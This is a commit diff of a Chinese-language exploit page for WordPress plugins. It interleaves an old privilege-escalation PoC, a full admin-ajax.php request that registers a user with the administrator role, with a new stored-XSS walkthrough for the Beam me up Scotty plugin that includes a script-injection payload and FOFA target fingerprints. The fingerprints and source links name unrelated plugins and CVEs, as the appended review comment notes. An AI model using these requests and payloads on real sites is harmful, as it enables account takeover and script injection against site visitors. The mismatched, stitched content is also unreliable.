Update WordPress Beam me up Scotty Plugin存在xss漏洞(CVE-2025-31864).md

This commit is contained in:
Rainyseason 2025-04-07 14:11:01 +08:00 committed by GitHub
parent 67466e18fa
commit f32dace32e
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194


@ -1,45 +1,31 @@
## WordPress Beam me up Scotty Plugin存在xss漏洞(CVE-2025-31864) ## WordPress Beam me up Scotty Plugin存在xss漏洞(CVE-2025-31864)
Beam me up Scotty 插件 1.0.23 及以下版本中,由于“返回顶部按钮”自定义设置的数据类型验证和转义处理不足,存在存储型跨站点脚本漏洞。
这些自定义设置只有具有管理员权限的用户才能访问,如果具有管理员权限的攻击者利用此漏洞,则所有显示“返回顶部按钮”的页面的访问者都将面临跨站点脚本攻击。
## fofa ## fofa
``` ```
"/wp-content/plugins/wp-automatic" body="/wp-content/plugins/web-directory-free"
``` ```
## 第一步 ## 第一步
通过 /registration 或 /membership-registration 前端页面注册 导航到自定义“返回顶部按钮”的菜单(/wp-admin/themes.php?page=beam-me-up-scotty_settings
## 第二步,注册后,使用该请求数据 ![image](https://github.com/user-attachments/assets/14e3a132-b211-484d-8bf7-1c3c7f26904d)
```
POST /wp-admin/admin-ajax.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: */*
Host: hackthebox.test
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: multipart/form-data; boundary=--------------------------189123966817005614765335
----------------------------189123966817005614765335 ## 第二步
Content-Disposition: form-data; name="action" 在启用了代理工具例如BurpSuite拦截的情况下点击返回顶部按钮设置菜单底部的保存按钮即可拦截保存返回顶部按钮自定义设置的请求包。
![image](https://github.com/user-attachments/assets/076678dc-90cd-4847-a337-eff3875f0a65)
user_registration_membership_register_member 将请求payload中payload的值改为beam_me_up_scotty_bottom_indentation如下然后执行Forward
----------------------------189123966817005614765335
Content-Disposition: form-data; name="security"
THE_NONCE_HERE
----------------------------189123966817005614765335
Content-Disposition: form-data; name="members_data"
{"membership":"MEMBERSHIP_ID","payment_method":"free","start_date":"2025-3-29","username":"REGISTERED_USERNAME","role":"administrator"}
----------------------------189123966817005614765335--
``` ```
## 第三步,返回相应包如下 20px;}</style><script>alert("XSS")</script><style>foo{bottom:0
``` ```
{ ![image](https://github.com/user-attachments/assets/f2f67dc8-ff2b-4094-b547-31f53cc94527)
"success": true,
"data": { ## 第三步
"member_id": 24, 访问WordPress网站后即可确认存在XSS漏洞。
"transaction_id": "", ![image](https://github.com/user-attachments/assets/cf800af5-0d55-46b1-a825-297494d5b18b)
"message": "New member has been successfully created."
}
} ## 漏洞来源
``` - https://github.com/4m3rr0r/CVE-2025-30208-PoC
## github地址
https://github.com/ubaydev/CVE-2025-2563
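Review bot: the reference links at the end of the new file do not match the vulnerability it documents. The "漏洞来源" (source) entry points at CVE-2025-30208-PoC and the "github地址" line at CVE-2025-2563, neither of which is CVE-2025-31864, so either replace them with the advisory or PoC that actually covers CVE-2025-31864 or drop them. The fofa section has the same inconsistency: the fingerprint on the new side still names the web-directory-free plugin rather than the Beam me up Scotty plugin the title is about, so that block should be corrected or removed in the same commit rather than carried over from the old file. Finally, "第一步" should state up front the precondition the description already gives two lines earlier: the "返回顶部按钮" settings page is only reachable with an administrator session, so this is a stored XSS that requires an already-privileged account, and placing the affected range (1.0.23 and below) next to the steps, together with what the fix needs to enforce (the indentation value is a CSS length, so the save handler should accept only a number plus unit and escape it on output), would let a reader judge impact and remediation without reading the whole page.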